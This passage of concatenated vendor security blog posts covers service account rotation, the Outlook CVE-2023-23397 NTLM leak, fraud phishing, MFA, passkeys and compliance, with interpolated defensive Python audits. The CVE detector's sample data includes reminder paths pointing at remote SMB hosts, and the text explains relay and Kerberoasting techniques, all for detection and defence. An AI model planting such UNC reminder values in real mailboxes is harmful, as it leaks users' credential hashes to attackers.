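    print("Rotation not backed by a 4724 event:", report["uncorroborated"])
    print("Sample policy-compliant password generated:", meets_policy(generate_password()))
```

With the constructed data, `svc-sql` is overdue and `svc-monitor` has an inventory date that no reset event backs up, which is exactly the kind of discrepancy the logging section says to look for. In a real environment the inventory would come from the directory (for AD, the `PasswordLastSet` attribute) and the events from a Security log export, with the parser adapted to that export's format.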
Password rotation tools can automatically generate, distribute, and validate new passwords for service accounts according to the organization’s password policy.

#### Password Rotation Tools

Tools like ManageEngine Password Manager Pro enable IT teams to automate password rotation for local accounts, domain accounts and service accounts across systems. These tools can generate random, complex passwords that meet password policy requirements and automatically update them on schedule. They provide an audit trail for compliance and send email notifications to account owners about password changes. On the other hand, Silverfort secures service accounts with automated discovery and monitoring of all service accounts, including the ones you’re not aware of, with fully automated visibility, risk analysis and adaptive Zero Trust policies, without requiring password rotation.

#### Scripting for Custom Rotation

For organizations with unique needs, scripting is an option to build customized password rotation. Scripts can be created using languages like PowerShell to automatically generate new passwords, update them on systems, and validate the changes. While scripting requires technical resources to develop and maintain, it provides maximum flexibility and control over the password rotation process.

### Active Directory

Active Directory (AD) plays a critical role in managing service accounts and implementing password rotation policies within a network environment, especially in enterprise settings. Here’s how:

1. Service Account Management: Active Directory is pivotal for managing service accounts, which are used by applications or services to interact with the network and access resources. Service accounts can be managed centrally, allowing for better control and oversight.
2. Password Policy Enforcement: AD allows the configuration and enforcement of password policies, including those related to password rotation, complexity requirements, and expiration.
3. Audit and Compliance: Active Directory provides logging and auditing capabilities that are essential for tracking password changes and access attempts, and for ensuring compliance with internal and external mandates.
4. Access Control: AD's role-based access control (RBAC) capabilities ensure that service accounts have the appropriate level of access, which is crucial for minimizing the risk associated with overly permissive service accounts.
5. Single Sign-On (SSO) and Group Policy Objects (GPO): Utilizing features like Single Sign-On and Group Policy Objects can simplify the management of service account passwords and enforce rotation policies across the organization.
6. Notification and Alerting: AD can be configured to provide notifications or alerts for expiring passwords, ensuring timely rotations and reducing the likelihood of service disruptions due to expired credentials.

### The Bottom Line: Rotating Passwords Mitigates Risk

Regularly rotating service account passwords is one of the most effective ways to reduce the risk of account compromise. Static, unchanged passwords provide a larger window of opportunity for unauthorized access. Rotating passwords on a frequent schedule, such as every 30-90 days, helps limit this exposure. Enforcing periodic password changes, in combination with complex, unique passwords for each account, makes it exponentially more difficult for cyber criminals to access systems and maintain that access long-term. Though it requires additional effort to regularly update passwords, platforms like Silverfort can secure service accounts without the need to rotate passwords.

---

- Published: 2023-03-16
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/silverfort-protection-against-cve-2023-23397-outlook-zero-day/

In the latest Patch Tuesday, Microsoft released a patch for CVE-2023-23397, a zero day in Outlook that was reported to be exploited in the wild.
Exploitation of this vulnerability enables an adversary to grab NTLM hashes (equivalent to user credentials) from the targeted machine and use them for malicious access to other machines in the environment. All this takes place as soon as a crafted email is downloaded to the machine’s inbox, without any need for interaction on the victim’s side. Microsoft has rated the severity of this vulnerability 'critical' and traced its exploitation to a Russian APT group targeting a limited number of organizations in the government, transportation, energy, and military sectors in Europe. In this article we provide a brief analysis of CVE-2023-23397 and show how Silverfort's Unified Identity Protection platform can mitigate the impact of its exploitation with a simple policy that enforces MFA on NTLM authentications.

### CVE-2023-23397 High-Level Analysis

#### Description of the Targeted Outlook Component

CVE-2023-23397 is an Elevation of Privilege vulnerability in the Outlook client for Windows. It abuses an antique attribute that still exists and enables a customized alert sound for a scheduled appointment. According to Microsoft’s documentation, the attribute ‘PidLidReminderFileParameter’ accepts a full path of a sound file. This field supports Universal Naming Convention (UNC) paths for accessing remote files and folders using the standard network file-sharing protocol, SMB. When the appointment is overdue, it triggers the customized sound and forces Outlook to reach the remote file.

#### Where Is the Vulnerability in This Component?

The problem with this behavior is that during the creation of the SMB session, an NTLM authentication is made to the remote server. Snatching the session can allow an adversary to perform an NTLM relay attack against another service on behalf of the victim, or alternatively brute-force the NTLM hash and obtain the user’s password. So, first and foremost, we strongly recommend upgrading all Outlook clients for Windows to the latest version.
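A defender-side check for the property just described, as an added example that is not Silverfort's or Microsoft's tooling: given calendar items with their `PidLidReminderFileParameter` value, it reports those whose reminder sound lives on a remote host, which is the condition that makes Outlook open an SMB session and authenticate with NTLM. The items, host names and the approved-server list are constructed; in a real deployment the property values would be read from mailbox items through the mail server's API, and hits would go to incident response, since reminder sounds are normally local files.

```python
"""Flag calendar items whose reminder-sound property points at a remote host,
the condition behind CVE-2023-23397.

Added example; not Silverfort's or Microsoft's tooling. Items, host names
and the approved-server list are constructed. A real scan would read the
PidLidReminderFileParameter property from mailbox items via the mail
server's API and hand hits to incident response.
"""
import re

PROP = "PidLidReminderFileParameter"

# Path shapes that make Windows open an SMB session to the named host:
# \\?\UNC\host\share, \\host\share, //host/share, file://host/share.
# The \\?\UNC\ form is tried before the generic \\ form.
_UNC_LONG = re.compile(r"^\\\\\?\\UNC\\(?P<host>[^\\/]+)", re.IGNORECASE)
_FILE_URL = re.compile(r"^file://(?P<host>[^/]*)/", re.IGNORECASE)
_UNC = re.compile(r"^[\\/]{2}(?P<host>[^\\/]+)")


def remote_host(value):
    """Return the host a reminder path would contact, or None if local."""
    if not value:
        return None
    v = value.strip()
    for pattern in (_UNC_LONG, _FILE_URL, _UNC):
        m = pattern.match(v)
        if m:
            host = m.group("host")
            # file:///C:/... has an empty host; \\?\C:\... is a local long path
            if host in ("", "?", "."):
                return None
            return host
    return None


def find_suspicious_reminders(items, approved_hosts=()):
    """(subject, host) for every item whose reminder sound is remote and
    whose host is not on the approved list."""
    approved = {h.lower() for h in approved_hosts}
    hits = []
    for item in items:
        host = remote_host(item.get(PROP))
        if host is not None and host.lower() not in approved:
            hits.append((item["subject"], host))
    return hits


# Constructed sample items; hosts use documentation ranges / example domains.
SAMPLE_ITEMS = [
    {"subject": "Team sync", PROP: r"C:\Windows\Media\Alarm01.wav"},
    {"subject": "Budget review", PROP: r"\\fileserver01\sounds\chime.wav"},
    {"subject": "Invoice overdue", PROP: r"\\203.0.113.7\s\a.wav"},
    {"subject": "Standup", PROP: r"\\?\UNC\reminder.example\share\x.wav"},
    {"subject": "Lunch", PROP: "//198.51.100.9/share/x.wav"},
    {"subject": "Training", PROP: "file://nas.example/share/x.wav"},
    {"subject": "Local long path", PROP: r"\\?\C:\Windows\Media\x.wav"},
    {"subject": "Local file URL", PROP: "file:///C:/Windows/Media/x.wav"},
    {"subject": "No reminder sound", PROP: None},
]
APPROVED_HOSTS = ("fileserver01",)   # constructed: the one sanctioned file server


if __name__ == "__main__":
    for subject, host in find_suspicious_reminders(SAMPLE_ITEMS, APPROVED_HOSTS):
        print(f"REVIEW: {subject!r} reminder sound on remote host {host}")
```

The forward-slash and `file://` forms are included because Windows resolves them to the same SMB access as a backslash UNC path, so a check that only looks for `\\` misses them. An approved-host list keeps a sanctioned internal file server from generating noise, but anything else remote, internal or not, is worth a look given that the post notes the vulnerability can also be triggered from inside the network.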
### CVE-2023-23397 Risk: Credential Theft Without User Interaction Required

The unique concern regarding this vulnerability is that it can be triggered without any user interaction at the moment the Outlook client receives the malicious appointment. This is because the faulty attribute is triggered when the appointment is overdue. This dramatically sets it apart from any vulnerability that requires interaction, such as opening an attachment or clicking a link. The entire exploitation process takes place in the background, providing the adversary the ability to access resources on the user’s behalf. The common security stack in today’s organization lacks the ability to detect and prevent, in real time, lateral movement attacks that employ NTLM relay. This makes CVE-2023-23397 an immediate threat that must be addressed.

### Silverfort Mitigation to Exploitation of CVE-2023-23397

Silverfort's Unified Identity Protection platform can protect against the exploitation of CVE-2023-23397. While Silverfort won’t prevent the exploitation itself, it deprives the adversary of the ability to use the stolen hash for malicious access, with a simple MFA policy. Silverfort performs continuous, real-time monitoring, risk analysis and policy enforcement for all authentications in the AD environment. As such, it can identify NTLM authentications and leverage this identification to trigger MFA verification.

#### Recommended Policy to Protect Against Potential NTLM Relay Attacks

We recommend the following:

1. Configure an NTLM policy for any server that is exposed to the internet. As an additional precautionary measure, you can also include sensitive resources that aren’t exposed to the Internet, since this vulnerability can also be exploited from inside the network.
2. Apply an MFA policy for non-NTLM authentication protocols, as there are variants of how the vulnerability can be exploited where the password is brute-forced, giving the attacker the ability to use it with other authentication protocols as well.

Screenshot #1: A sample policy that implements recommendation #1.

Per recommendation #2, you can configure additional policies in which Kerberos and LDAP(S) would be checked. Also, in the source field, you can add any sensitive resource you want to include in this protection. If you would like the ability to protect NTLM and other AD protocols with MFA, feel free to reach out and request a demo or visit our website.

---

- Published: 2023-03-13
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/take-caution-top-3-security-risks-and-mitigation-practices-following-svb-collapse/

The collapse of Silicon Valley Bank bears direct implications for adversaries’ activity. As always, uncertainty and panic are threat actors’ closest allies, and we're already hearing reports of a distinct surge in fraud attacks that attempt to leverage the confusion and concern to lure users into fraudulent transfers as well as credential disclosure. In this article we summarize the main risks organizations are likely to be exposed to, as well as best practices to proactively counter and mitigate them (such as enabling MFA on banking systems).

### Risk #1: Fraudulent Transfers

#### Sample Scenario

The most typical pattern is impersonating a legitimate destination for a money transfer. For example, the adversary impersonates one of your suppliers, claiming that it has moved from SVB to another bank and urgently asking you to wire payment to this new account. The unsuspecting victim wires the payment to the attacker’s bank account.

#### Mitigation Steps

Remind your workforce to avoid performing transactions to accounts whose details they received via email.
Any change in existing wiring destinations must be explicitly verified rather than immediately trusted. This verification should consist of reaching out to the actual person the email purports to come from and validating that they really sent the request, and not an impersonating adversary. As a supplier, proactively inform your customers what the reliable processes are for informing them of any changes in your bank accounts.

### Risk #2: Phishing for Bank Account Credentials

#### Sample Scenario

The adversary sends an email impersonating the FDIC, SVB, or another government agency, containing a reassuring message that your deposits in SVB can be fully returned. However, for this to happen you should urgently log in to your new bank account via a provided link. This link, needless to say, leads to an adversary-controlled web page, and your credentials are now compromised.

#### Mitigation Steps

Remind your workforce to increase their vigilance towards emails that request credentials, or even better – ban any form of providing credentials to links incorporated in email messages. It’s also recommended to expand this policy to any sort of inbound communication, including phone calls and text messages. Specifically for the scenario described above, don’t take any independent action, but rather follow official online sources for instructions on receiving your money back.

### Risk #3: Spreading Panic

#### Sample Scenario

In addition to the above direct risks, adversaries may also attempt to leverage the existing, tense atmosphere to accelerate panic and uncertainty by spreading fake news on the alleged collapse risk of additional banks. You may see viral messages informing you that the banks you’re working with are at risk, urging you to withdraw your deposits before it becomes too late.

#### Mitigation Steps

Only trust official communication channels from your banks and avoid forwarding unvalidated messages.
### Complement Workforce Security Education with Hardening Your Email Security

Your business email is the primary attack vector adversaries employ to deliver fraud attacks. While employee education is paramount, it must have a security technology counterpart, making the prevention of business email compromise a crucial task. To prevent threat actors from compromising user accounts and sending messages on their behalf, you should enforce the following:

- Enforce MFA verification on any access to an employee’s email.
- Disable legacy email protocols that are more susceptible to compromise.
- Block access to email from risky locations.

### Conclusion

While remaining secure in times of crisis is challenging, it’s a task within your reach. The calmer you stay, and the more this calmness is implemented in the day-to-day security practices of your employees, the more resilient your environment will be to the building wave of fraud attacks.

---

- Published: 2023-03-02
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/mfa-and-administrative-access-protection-are-the-means-but-to-what-end/

Every so often in cybersecurity it’s useful to reflect on things taken for granted and choices made — specifically why they were made and whether these things achieved their purpose. For example, let’s examine the use of MFA and the protection of administrative access. We know these are critical, but why? Furthermore, what does it mean to not have these security measures in place? In this article, we’ll examine some commonly accepted (but equally ignored) truths about the objectives behind MFA and privileged access control, the risks they mitigate, and the barriers to getting them fully deployed across an environment. We’ll conclude by demonstrating how Silverfort’s Unified Identity Protection platform enables identity and security teams to close these gaps and ensure their environments are protected against account takeover, lateral movement, and ransomware spread.
### Recap: What Are MFA and Administrative Access Controls?

MFA and administrative access controls augment the user authentication process by adding a protection layer on top of the basic username-password match. The rationale is that credentials can get compromised, which means adversaries would be able to log in using a legitimate username and password. MFA mitigates this scenario by ensuring that the true user is challenged to verify their identity by providing a genuine identifier the adversary is unlikely to have. A Privileged Access Management (PAM) solution can achieve essentially the same thing by making the act of credential compromise significantly harder, via vaulting and regular password rotation.

### The False Purpose: A Checkbox Mentality That Inevitably Leads to Security Gaps

The most common error that identity or security teams make with MFA is mistaking the means for an end. For example, thought processes like “We need to apply MFA in order to be compliant with regulation X,” or “We need to increase MFA coverage so we can show management we’re making progress.” This type of thinking is fundamentally flawed, since it ensures that whenever a technological barrier to deploying either MFA or privileged account access controls appears (we’ll show examples of these later in this article), the deployment simply won’t happen. Compliance requirements might be satisfied with some vague compensating control, with protection coverage progressing only incrementally — by protecting what’s easy to protect, rather than what will substantially improve the environment’s resilience. The reality is that the only way to achieve better protection is to constantly keep in mind what it is we’re seeking to achieve. So let’s examine what exactly the protection is that we want to achieve with MFA and administrative access controls, and what the threats are that we’re attempting to mitigate.
### The True Purpose: Prevent Identity Threats Such as Account Takeover, Lateral Movement, and Ransomware Spread

Drilling down into the true purpose of these protections, what’s clear is that it is really about preventing identity threats (i.e., any type of attack or attack component that involves the use of compromised credentials for malicious access). The most prominent examples of these are account takeovers, lateral movement, and ransomware spread. And this is a big deal because these are precisely the threats that introduce the highest operational risk to organizations today. So let’s understand why.

### Identity Threats Are the Ultimate Damage Accelerators in Cyber Attacks Today

So why is identity threat protection a critical necessity? Let’s use the ransomware example to better understand why. Ransomware attacks always start with an initial compromise of a workstation or server that then provides the adversary with an initial foothold in the targeted environment. At this point, though, the damage is confined to just a single machine. The X factor here is the lateral movement stage, where the adversary uses compromised credentials to log in and access additional machines in the environment until they reach a position that will enable them to plant the ransomware payload on as many machines as possible. Now, the attack has evolved from a local, single-machine event to one that could actually halt business operations.

### How the Checkbox Mentality Puts Environments at Risk

This is exactly what MFA and PAM solutions are supposed to stop. So you can see how a compliance checkbox mentality comes up short. In order to block identity threats, MFA and PAM protection must encompass all users, resources and access methods. Anything less than that leaves adversaries an open door. However, traditional MFA and PAM technology limitations make achieving this type of coverage practically impossible.
The checkbox mentality is especially dangerous because both regulators and management may be satisfied because a best effort was shown. As well, identity teams may feel like they’ve done their jobs to the best of their abilities. However, it’s really the adversaries who will be the most satisfied, since their operations will be able to continue without detection. And to a large extent, this is unfortunately the identity protection status quo in many organizations today.

### What Are the Technology Barriers That Prevent MFA and Privileged Access Control From Being Deployed Across the Entire Environment?

Now, let’s understand what the challenges are in ensuring that all users, resources, and access methods are protected.

#### Traditional MFA: Agent-Dependent With No Coverage for Active Directory Authentication Protocols

Traditional MFA products either require installing agents on the protected servers and workstations or else placing proxies in front of network segments. What this means in practice is that there will always be machines without protection — either because they can’t accept additional agents or because the network architecture is too complex. The second limitation is even more problematic. Active Directory’s (AD) authentication protocols, including NTLM and Kerberos, were written long before MFA technology came into being. This makes MFA protection inapplicable to the wider portion of AD authentication. So authentications via command-line access tools that have been built over these protocols – such as PsExec, Remote PowerShell, and WMI (all of which are extensively used by admins for connecting to remote machines) – cannot be protected. This is exactly why these are the tools of choice for lateral movement attacks. The inability to protect them with MFA means that once an adversary has managed to obtain compromised credentials, there’s no way to stop them from accessing as many resources as they want.
#### Privileged Access Protection: An Arduous Deployment Process With No Protection for Service Accounts

While PAM is considered the straightforward way to protect privileged accounts, it’s also subject to two key limitations that significantly limit its effectiveness. The first is an extremely long and tedious onboarding process, which entails the manual discovery of all privileged accounts that need protection as well as separate integrations with every individual component of the IT infrastructure. The second is a fundamental mismatch between PAM’s vaulting and rotation security mechanisms and the nature of machine-to-machine service accounts. Onboarding these accounts to the PAM is essentially impossible because: 1) there is no utility that can provide instant visibility into these accounts, making their discovery a painstaking and often impossible effort, and 2) even after the discovery of a service account, there is still no visibility into its source and target machines or the apps that it runs. Without this information, you simply can’t apply password rotation to the account without the risk of breaking any processes it manages. These gaps in MFA and privileged account protection are the reason they’ve become a key attack surface that adversaries target with great success.

### Silverfort Unified Identity Protection: MFA Everywhere and Automated Discovery, Monitoring, and Protection for Service Accounts

Silverfort has pioneered the first purpose-built Unified Identity Protection platform that can extend MFA to any user and resource, automate the discovery, monitoring, and protection of service accounts, and proactively prevent lateral movement and ransomware spread attacks.
Silverfort connects to all Domain Controllers and other on-prem Identity Providers (IdPs) in the environment for continuous monitoring, risk analysis, and access policy enforcement on every authentication and access attempt made by users, admins, or service accounts to any user, system, and environment. Identity and security teams use Silverfort's platform to easily implement the 360-degree coverage their environments need to gain protection against identity threats.

Do you need to increase the coverage of your MFA protection across all your users and systems, or get visibility into and protection for your service accounts? Schedule a call with one of our experts.

---

- Published: 2023-02-22
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/passwords-end-with-passkeys/

The death of passwords has been declared repeatedly by the security community, but now it might stick with the introduction of passkeys. In this blog, we will provide an overview of the evolution of password security, contrasting it with more modern authentication methods. We will also highlight the passwordless authentication gaps that attackers are exploiting and explore the benefits of passkeys.

### The History of Password Security

Password security has been evolving over the years, starting with taking a simple password and making it more complex by introducing special characters and/or greater length. While this made passwords harder to crack, it did not solve the problem of stolen or divulged passwords being used in identity-based attacks. As password security continued to evolve, multi-factor authentication (MFA), combining something you know (a password) with something you have (a numeric token, fingerprint, RFID, etc.), became the gold standard for authentication. MFA continues to be a strong and very popular solution, and it went a long way toward curtailing the use of compromised passwords.
However, there was still a fundamental issue: the password itself. Passwords inherently remained weak, easily broken, and always susceptible to social engineering attacks. Not to mention the inconvenience of humans needing to remember these passwords, which led to the habit of writing them down and, in many cases, reusing the same password everywhere to avoid remembering multiple passwords.

### Passwordless Authentication

To strengthen password security, passwordless authentication has become a more widely accepted solution because it removes the human factor and the inconvenience of creating and remembering a password, and it removes an attacker's ability to remotely socially engineer or steal a password from a user. A common form of passwordless authentication is passkeys. Passkeys are authentication credentials that serve as a sole, primary authentication, more secure than any form of authentication based on a password plus another factor, because they encapsulate the core tenets of multi-factor authentication into a single authentication step. This makes authentication faster, easier, and more secure for the user.

Passkeys are based on two protocols: FIDO2 and WebAuthn. These protocols have proven resistant to threats such as phishing, credential stuffing, and man-in-the-middle (MiTM) attacks. A passkey can be used by scanning a presented QR code with your phone's camera, with a physical device such as a YubiKey, and/or with biometric information such as your face (as in Windows Hello) or your fingerprint. Now, with passkeys and Silverfort, you can protect your network identities with MFA without the need to download a third-party application. Third-party applications are commonly used in cyber-attacks, and leaving them behind improves the security posture even further.
### Silverfort: More Passwordless

As an additional step in the authentication process, Silverfort can implement passkeys and bridge them to applications, service accounts, command-line interfaces, and other platforms that otherwise cannot support this modern authentication type. Silverfort's capabilities allow organizations across industries to bridge multiple authentication types, such as traditional multi-factor and passkeys, into a ubiquitous identity solution. Silverfort provides the identity control plane and empowers customers to deploy user access control policies that govern access to critical and sensitive resources in their environment.

To learn more, request a demo here.

---

- Published: 2023-02-07
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/compliance-with-ccop-identity-protection-requirements-made-easy-with-silverfort/

The Cybersecurity Code of Practice for Critical Information Infrastructure 2.0 (CCOP) is an enhancement of the first version, released in 2018. This cybersecurity standard specifies the minimum cybersecurity requirements that organizations operating Critical Information Infrastructure (CII) should implement. It applies to all components of a CII's IT or OT system and/or network infrastructure, including the physical devices and systems, software platforms, and applications of the CII. All organizations subject to CCOP must implement, or show significant adoption of, the guidelines and practices it outlines by 4 July 2023. Silverfort enables CII operators to take a great step toward this goal by addressing the identity protection aspect of CCOP, including the implementation of least privileged access policies, protection of privileged accounts, comprehensive MFA protection, and Domain Controller protection.
### Planning your CCOP Implementation Journey

Full implementation of CCOP requirements can materially reduce an organization's attack surface, as well as equip it with efficient tools to detect, respond to, and remediate both commodity and advanced cyberattacks. However, such implementation is not achieved in a fortnight. The pressing question for CII security stakeholders is what the best path is to close the various gaps between the current security posture of their environments and the one CCOP demands. In simple terms it boils down to: 'Both product X and product Y check important CCOP boxes; which should come first?' In an ideal world with endless budgets and security personnel the answer would be 'Both. Now.' In the real world, however, prioritization is inevitable.

#### The Prioritization Rule: Most Value in the Shortest Time

As most security practitioners know, two factors outrank all others. The first is the security value: what delta a prevention, detection, or response capability of a certain product adds over what you have now. No less important is the time-to-value aspect, i.e. how long it takes to get the product up and running so it delivers the security delta you chose it for. Too often these contradict each other, with security products that carry a great protection promise but take significant time and resources to deploy, or the other way around: instant deployment that yields low security returns. Neither group qualifies as a starting point for the CCOP compliance journey. Rather, security stakeholders should search for the security products and categories that maintain a fair balance between the security and time-to-value factors.

#### Starting with Identity Protection Yields the Highest Security Return

Identity threats is the term that describes all attacks that utilize compromised credentials for malicious access to targeted resources.
The most prominent examples are account takeover, malicious remote connection to the internal environment, and lateral movement. Over 70% of ransomware attacks, for example, utilize compromised credentials to spread the ransomware payload in the network, materially increasing the attacks' impact. There are over 20 billion compromised credentials circulating on the dark web, used regularly in adversaries' cyber operations. The identity attack surface is the least protected in the IT environment today because, unlike malware, exploits, or phishing attacks, malicious access with compromised credentials is identical to legitimate access, making it extremely hard to identify and block.

### CCOP Identity Protection Requirements: Least Privilege Access, MFA, Privileged Access Protection and Domain Controller Monitoring

Acknowledging its importance, CCOP dedicates significant attention to the protection, detection, and response capabilities that increase the organization's resilience to identity threats, with special focus on the following aspects:

#### Attack Surface Reduction: Least privileged access

The principle of least privileged access dictates that every user account should be able to access only the resources it needs to perform its duties, with no excessive access rights beyond that. In that case, even if the account gets compromised, the adversary can access only a limited number of resources.

#### Attack Prevention (i): Privileged access protection

Privileged accounts are among the most targeted entities, due to access privileges that often encompass all machines and apps in the environment. As a result, it is imperative for security teams to enforce proactive measures that prevent adversaries from utilizing them for malicious access.

#### Attack Prevention (ii): Multi-Factor Authentication (MFA)

The tested and proven solution against the use of compromised credentials is MFA, which can prevent more than 99% of account-takeover-based malicious access.
When implemented comprehensively, MFA can completely eliminate the risk of compromised credentials, as these alone no longer suffice to access resources.

#### Attack Detection: Domain Controller (DC) monitoring

The DC is the nerve center of the on-prem environment and cloud workloads and is, in practice, the target of almost every cyberattack, since dominating it gives adversaries unlimited access to any resource they desire. Circling back to the example of ransomware, it is the DC compromise that enables ransomware actors to distribute the encryption payload across the entire environment. Hence, the ability to monitor DC activity and spot anomalies that indicate malicious activity is of utmost importance.

### Silverfort: Address all CCOP Identity Protection Challenges with Speed and Ease

Silverfort pioneers the first purpose-built Unified Identity Protection platform that can extend MFA to any user and resource, automate the discovery, monitoring, and protection of service accounts, and proactively prevent lateral movement and ransomware spread attacks. Silverfort connects to all the Domain Controllers and other on-prem Identity Providers (IdPs) in the environment for continuous monitoring, risk analysis, and access policy enforcement on every authentication and access attempt made by users, admins, or service accounts to any user, system, and environment. With Silverfort, organizations can fully address all the CCOP identity requirements described above, making it an ideal first step in the CCOP compliance journey. Consolidating least-privileged access, privileged account protection, MFA, and DC monitoring in a single platform makes it possible to show distinct progress toward the CCOP resilience goals, while securing the identity attack surface, which today sits at the very core of adversaries' cyber operations.
To learn the full details of Silverfort's CCOP alignment, together with a table listing the explicit sections to which Silverfort's protection applies, download this solution brief.

---

- Published: 2023-02-02
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/need-an-insurance-policy-against-ransomware-attacks-get-silverforts-free-identity-security-assessment/

Many organizations are struggling today to align their security controls with what underwriters now require in order to get cyber insurance coverage against ransomware attacks. From the identity protection perspective, even the initial discovery of the MFA and administrative access gaps to address can be a severe challenge, due to a lack of tools that can reveal the security posture of all admin users and service accounts. This is why Silverfort is launching a free cyber insurance assessment offering: to assist organizations in this task and enable them to easily meet insurers' requirements.

### What is Silverfort's Free Identity Security Assessment?

Silverfort's free cyber insurance assessment enables cyber insurance applicants to overcome these obstacles by providing comprehensive visibility into all admin accounts that need MFA protection as well as into all service accounts, including their privilege level and activities. In addition, the assessment uncovers any security hygiene issues that can expose the environment to identity threats, while also detecting any active ones already underway. With this information in hand, organizations can easily identify the identity security gaps preventing them from aligning with what insurers require, and resolve them to get the cyber insurance policy they need.
Silverfort's identity security assessment provides you with findings of the following types:

#### Findings Type 1: Admin Users Visibility

The most stringent requirement insurers have is to apply MFA protection on all administrative access across the various resources in the environment, such as directory services, networking infrastructure, command-line access, and others. Silverfort's assessment provides complete visibility into all admin users (including shadow admins you might not be aware of) and the resources they access, enabling you to easily see their existing level of MFA coverage and, in the case of any gaps, extend this protection to all necessary users and resources.

Screenshot 1: Admin users visibility

#### Findings Type 2: Service Accounts Discovery

Another important aspect of cyber insurance eligibility is being able to demonstrate that you can monitor and protect your service accounts. Silverfort's assessment provides you with complete visibility into your service account inventory and also shows you their privilege levels, source and destination, and the overall activity of each account. Most importantly, this assessment will enable you to determine whether any of these accounts is at risk or is behaving in an anomalous way that could indicate its compromise.

Screenshot 2: Service accounts discovery

#### Findings Type 3: Identity Security Hygiene

Silverfort's assessment tool can also identify security weaknesses in your environment that reduce its resilience to identity threats, exposing it to various attack methods. Examples include stale passwords in use, accounts with passwords that never expire, admin users with an SPN (making them vulnerable to Kerberoasting attacks), and the use of weak protocols like NTLM and NTLMv1. Resolving these previously undetected hygiene issues is a key step in reducing a threat actor's ability to attack your environment.
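The hygiene checks just listed can be expressed as a small audit over an account inventory and a logon feed. The following is an added example written for this page, not Silverfort's assessment code: it flags stale passwords, passwords that never expire (the `DONT_EXPIRE_PASSWORD` bit of `userAccountControl`), admin accounts that carry an SPN, and NTLM / NTLMv1 logons. The account records, the logon events, the 365-day staleness threshold and the field names are constructed assumptions about what an LDAP export and a Windows logon event feed would look like.

```python
"""Identity hygiene findings over a constructed AD inventory (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

DONT_EXPIRE_PASSWORD = 0x10000           # userAccountControl bit: password never expires
STALE_PASSWORD_DAYS = 365                # threshold chosen for this example
ADMIN_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
NOW = datetime(2023, 2, 1, tzinfo=timezone.utc)   # fixed clock keeps results reproducible


def days_ago(n):
    return NOW - timedelta(days=n)


# Constructed sample accounts; field names are an assumption about the export shape.
ACCOUNTS = [
    {"sam": "svc_backup", "uac": 0x10200, "pwdLastSet": days_ago(900),
     "spns": ["MSSQLSvc/db01.corp.example:1433"], "groups": ["Domain Admins"]},
    {"sam": "jdoe", "uac": 0x200, "pwdLastSet": days_ago(30),
     "spns": [], "groups": ["Domain Users"]},
    {"sam": "ops_admin", "uac": 0x200, "pwdLastSet": days_ago(400),
     "spns": [], "groups": ["Administrators"]},
]

# Constructed sample logon events, loosely modelled on the authentication
# package / NTLM version fields of a Windows logon event (an assumption).
LOGON_EVENTS = [
    {"account": "svc_backup", "package": "NTLM", "ntlm_version": "NTLM V1"},
    {"account": "jdoe", "package": "Kerberos", "ntlm_version": ""},
    {"account": "jdoe", "package": "NTLM", "ntlm_version": "NTLM V2"},
]


def is_admin(acct):
    """True when the account belongs to any of the privileged groups."""
    return bool(ADMIN_GROUPS & set(acct["groups"]))


def hygiene_findings(accounts=ACCOUNTS, events=LOGON_EVENTS, now=NOW):
    """Map each account name to the set of hygiene issues found for it."""
    findings = defaultdict(set)
    for a in accounts:
        if a["uac"] & DONT_EXPIRE_PASSWORD:
            findings[a["sam"]].add("password-never-expires")
        if (now - a["pwdLastSet"]).days > STALE_PASSWORD_DAYS:
            findings[a["sam"]].add("stale-password")
        if is_admin(a) and a["spns"]:
            # A privileged account with an SPN can be Kerberoasted offline.
            findings[a["sam"]].add("admin-with-spn")
    for e in events:
        if e["package"] == "NTLM":
            tag = "ntlmv1-logon" if e["ntlm_version"] == "NTLM V1" else "ntlm-logon"
            findings[e["account"]].add(tag)
    return dict(findings)


if __name__ == "__main__":
    for name, issues in sorted(hygiene_findings().items()):
        print(f"{name:12} {', '.join(sorted(issues))}")
```

On the sample data `svc_backup` collects all four issue types at once, which is exactly the kind of account an assessment should surface first: a privileged, Kerberoastable service account with a years-old password that still authenticates over NTLMv1.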
Screenshot 3: Identity security hygiene

#### Findings Type 4: Active Identity Threats

Silverfort's risk assessment can also spot any live identity threats that are active in the environment at the time of the assessment. These include common lateral movement techniques (Pass-the-Ticket, Pass-the-Hash, etc.), credential capture such as Kerberoasting, brute force attempts, and others that involve the compromise of credentials and their use for malicious access. These techniques are what enable ransomware actors to spread within a targeted environment and escalate the impact of their attacks, from a single machine to an entire network.

Screenshot 4: Active identity threats

### Take the Next Step with Your Identity Security

Complying with all the new requirements for a cyber insurance policy can be a challenge, especially if you don't have full visibility into your environment. Thanks to Silverfort's free identity risk assessment, organizations can meet this challenge head-on. Uncover your security gaps, qualify for cyber insurance, and eliminate the threat of ransomware. Sign up today.

---

- Published: 2023-01-25
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/bounce-the-ticket-and-silver-iodide-attacks-on-azure-ad-kerberos/

Silverfort research finds threat actors could attack a new Microsoft cloud authentication protocol to steal or forge cloud tickets and carry out lateral movement.

### Summary

Silver Ticket and Pass the Ticket (PTT) are infamous legacy on-prem Kerberos attacks used to perform lateral movement in Active Directory. Marking another step toward the cloud, Microsoft recently made Azure AD Kerberos, its cloud-based implementation of the Kerberos protocol, generally available. Azure AD Kerberos enables authentication to cloud resources without having to use an on-premises Active Directory.
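The first mitigation this post recommends below is to verify that only authorized principals hold the Microsoft.ClassicStorage/storageAccounts/listKeys/action permission. The following is an added example of such an audit, written for this page and not Silverfort's or Microsoft's code. It evaluates Azure RBAC the way the platform does at a high level: an assignment grants an action when its scope contains the resource, the action matches one of the role's `Actions` patterns (wildcards allowed) and matches none of its `NotActions`; matching is case-insensitive. Deny assignments and data actions are left out for brevity, and the role definitions, assignments and scope identifiers are constructed samples, not a real tenant.

```python
"""Who can run the Kerberos key extraction (listKeys) action? (added example)"""
import fnmatch

LISTKEYS_ACTION = "Microsoft.ClassicStorage/storageAccounts/listKeys/action"

# Constructed role definitions. Built-in role names are used for realism but
# their action lists are simplified; the custom roles are invented for the example.
ROLES = {
    "Owner": {"Actions": ["*"], "NotActions": []},
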